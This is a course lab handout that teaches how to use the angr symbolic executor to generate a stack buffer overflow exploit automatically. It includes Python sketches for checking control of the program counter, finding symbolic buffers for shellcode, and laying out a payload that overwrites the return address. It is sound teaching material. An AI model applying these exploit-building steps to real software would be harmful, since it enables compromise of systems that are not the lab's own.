===================================
Lab3: Automated Exploit Generation
===================================

Download the test case from `here <l/example01.c>`__.
You need a Linux environment for all the labs.

--------------
0. Preparation
--------------

First, we are going to use Angr to perform symbolic execution and automatically
generate a working exploit. Angr is not the fastest symbolic executor, but it is
written in Python, so it is easy to use.

Follow the instructions at https://angr.io/ to install Angr.

**UPDATE**: it turns out angr does not support the ``gets`` function used in the
example. To fix this, download the `implementation <l/gets.py>`__ and add the
following lines to your exploit script to register the handler before creating
the ``Project`` object.

.. code-block:: python

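    import angr
    from gets import gets  # the gets() implementation downloaded above

    # Register the gets() handler with angr's libc model.
    # This must run before the Project is created.
    angr.SIM_LIBRARIES["libc.so.6"].add("gets", gets)

    proj = angr.Project("example01")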


--------------
1. Objectives
--------------

The objective of this lab assignment is to learn how to use a symbolic executor
to generate an exploit for a stack buffer overflow vulnerability. Generally,
this involves three steps: finding the vulnerability, finding where to inject
the shellcode, and redirecting execution to the injected shellcode.

Angr already provides `many good tutorials <https://github.com/angr/angr-doc/blob/master/docs/examples.md>`__
on how to use it for reverse engineering, including
`how to generate exploits <https://github.com/angr/angr-doc/blob/master/docs/examples.md#exploitation>`__.

------------
2. Workflow
------------

Step one: try to find an execution trace that lets you control the program
counter (PC). To do so, we let Angr perform path exploration to find a
simulation state that is `unconstrained <https://docs.angr.io/core-concepts/pathgroups#stash-types>`__.
This is similar to the taint checker in the paper we discussed.
Note that Angr considers a state unconstrained when the PC is symbolic (i.e.,
under the control of inputs), but such control could be partial (e.g., when only
one byte of the return address is overwritten). Such a state may still be
exploitable, but to make the exploit easier, you can further check `whether all
the bytes of the PC are symbolic
<https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L15>`__.
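
The full-control check can be sketched as below. In angr, ``state.regs.pc`` is a
bitvector, ``pc[i]`` extracts its bit ``i`` (bit 0 is the least significant), and
``state.solver.symbolic(expr)`` reports whether an expression depends on symbolic
input; the linked example combines these over ``state.arch.bits`` bits. To keep
this sketch runnable without angr, the per-bit test is passed in as a callable,
and the helpers ``controlled_pc_bytes`` and ``pc_fully_controlled`` are
hypothetical names. With angr you would pass something like
``lambda i: state.solver.symbolic(state.regs.pc[i])``.

.. code-block:: python

    from typing import Callable, List


    def controlled_pc_bytes(is_symbolic_bit: Callable[[int], bool], width: int = 64) -> List[int]:
        """Return indices of PC bytes (0 = least significant) whose 8 bits are all symbolic.

        Hypothetical helper: is_symbolic_bit(i) stands in for an angr query such as
        state.solver.symbolic(state.regs.pc[i]).
        """
        return [
            byte
            for byte in range(width // 8)
            if all(is_symbolic_bit(byte * 8 + bit) for bit in range(8))
        ]


    def pc_fully_controlled(is_symbolic_bit: Callable[[int], bool], width: int = 64) -> bool:
        """True only if every byte of the PC is under input control."""
        return len(controlled_pc_bytes(is_symbolic_bit, width)) == width // 8


    # Toy model: if only the first byte of the saved return address is overwritten,
    # little-endian x86-64 gives control over the least significant PC byte only.
    print(controlled_pc_bytes(lambda i: i < 8))   # [0]
    print(pc_fully_controlled(lambda i: i < 8))   # False
    print(pc_fully_controlled(lambda i: True))    # True

A partially controlled state is not discarded by this check; it simply tells you
that the easy "jump anywhere" exploit is not available from that state.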

Once you have found a program state that could be exploitable, the next step is
to find a location to inject your shellcode. To do so, you can search the virtual
memory for a contiguous sequence of symbolic (tainted) bytes that is large
enough to hold the shellcode
(see, e.g., `this <https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L38>`__).
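
Finding such a region can be sketched as follows. The linked example first
collects the addresses that hold symbolic stdin bytes and then checks, address by
address, whether the next ``length`` addresses are also in that set. The
hypothetical helper ``find_symbolic_buffers`` below assumes those addresses are
already available as plain integers (so it runs without angr); instead of
checking each address separately, it sorts them once and reports every maximal
run of consecutive addresses that is at least ``length`` bytes long.

.. code-block:: python

    from typing import Iterable, Iterator, Tuple


    def find_symbolic_buffers(sym_addrs: Iterable[int], length: int) -> Iterator[Tuple[int, int]]:
        """Yield (start, size) for each run of consecutive symbolic addresses with size >= length."""
        addrs = sorted(set(sym_addrs))
        if not addrs:
            return
        start = prev = addrs[0]
        for addr in addrs[1:]:
            if addr != prev + 1:
                # The run [start, prev] just ended; report it if the shellcode fits.
                if prev - start + 1 >= length:
                    yield start, prev - start + 1
                start = addr
            prev = addr
        # Report the final run as well.
        if prev - start + 1 >= length:
            yield start, prev - start + 1


    # Toy input: a 16-byte symbolic region on the stack and a 4-byte region elsewhere.
    sym = list(range(0x7FFFFFFFE000, 0x7FFFFFFFE010)) + list(range(0x601040, 0x601044))
    for start, size in find_symbolic_buffers(sym, length=8):
        print(hex(start), size)   # 0x7fffffffe000 16

Each reported run is only a candidate; whether its bytes can really hold the
shellcode is still up to the solver.
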
Then, we check whether it is feasible to constrain the symbolic bytes so that
they are interpreted as shellcode. This should be straightforward if the bytes
are copied directly from the input, but it can be challenging for programs that
transform the input.
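
To see why transformations matter, consider the special case where the program
transforms each input byte independently (a simplifying assumption; when bytes
are mixed together you need the SMT solver). A shellcode byte is then feasible
only if some input byte maps to it. The hypothetical helper ``invert_bytewise``
below builds the preimage table of such a transformation and returns input bytes
that produce the shellcode, or ``None`` if some shellcode byte can never be
produced. With an upper-casing transformation, for instance, the byte ``0x68``
(ASCII ``h``) can never appear in the buffer.

.. code-block:: python

    from typing import Callable, Dict, Optional


    def invert_bytewise(shellcode: bytes, transform: Callable[[int], int]) -> Optional[bytes]:
        """Return input bytes that transform maps onto shellcode, or None if impossible."""
        # Preimage table: for every byte the program can output, one input byte producing it.
        preimage: Dict[int, int] = {}
        for b in range(256):
            preimage.setdefault(transform(b), b)
        out = bytearray()
        for target in shellcode:
            if target not in preimage:
                return None  # no input byte can ever produce this shellcode byte
            out.append(preimage[target])
        return bytes(out)


    def to_upper(b: int) -> int:
        """Model of a program that upper-cases ASCII letters in its input."""
        return b - 0x20 if 0x61 <= b <= 0x7A else b


    shellcode = b"\x31\xc0\x50\x68"  # a few example x86 shellcode bytes
    print(invert_bytewise(shellcode, lambda b: b))         # direct copy: same bytes
    print(invert_bytewise(shellcode, lambda b: b ^ 0x41))  # XOR: each byte XORed with 0x41
    print(invert_bytewise(shellcode, to_upper))            # None: 0x68 cannot survive upper-casing

Expressing the same requirement as a constraint on the symbolic memory, rather
than inverting the transformation by hand, lets the SMT solver also handle
transformations that are not byte-wise.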

The last step is to connect the symbolic PC to the location of the shellcode
by adding the constraint that the `PC should equal the address of the buffer
that holds the shellcode <https://github.com/angr/angr-doc/blob/master/examples/insomnihack_aeg/solve.py#L98>`__.
Finally, we ask the SMT solver for an assignment to the input bytes that
satisfies all three conditions (1. control of the PC, 2. shellcode in memory,
3. PC pointing to the shellcode).
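
For intuition, when the input is copied verbatim (as ``gets`` does), a satisfying
assignment reduces to a simple byte layout: the shellcode at the start of the
buffer, padding up to the saved return address, and the buffer address in place
of the return address. The sketch below builds that layout by hand. The 64-bit
little-endian target, the buffer address, and the offset to the return address
(``ret_offset``) are all assumptions, and ``build_payload`` is a hypothetical
helper, not part of angr.

.. code-block:: python

    import struct


    def build_payload(shellcode: bytes, buf_addr: int, ret_offset: int) -> bytes:
        """Lay out shellcode + padding + overwritten return address (x86-64, little-endian)."""
        if len(shellcode) > ret_offset:
            raise ValueError("shellcode does not fit before the saved return address")
        # Condition 2: the shellcode occupies the start of the buffer.
        payload = shellcode + b"A" * (ret_offset - len(shellcode))
        # Conditions 1 and 3: overwrite the saved return address with the buffer address.
        payload += struct.pack("<Q", buf_addr)
        # gets() stops reading at a newline, so the payload must not contain one.
        if b"\n" in payload:
            raise ValueError("payload contains a newline and would be truncated by gets()")
        return payload


    # Hypothetical values: 16 bytes of shellcode, buffer at 0x7fffffffe000,
    # saved return address 72 bytes past the start of the buffer.
    payload = build_payload(b"\x90" * 16, 0x7FFFFFFFE000, ret_offset=72)
    print(len(payload))  # 80

In the lab itself the solver produces these bytes for you (the linked example
writes them out with ``state.posix.dumps(0)``); a hand-built layout like this is
mainly useful for sanity-checking the solved input.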

--------------
3. Submission
--------------

Please submit your report through iLearn, preferably in PDF format.
In the report, please include your complete source code with sufficient explanation, along with its output messages.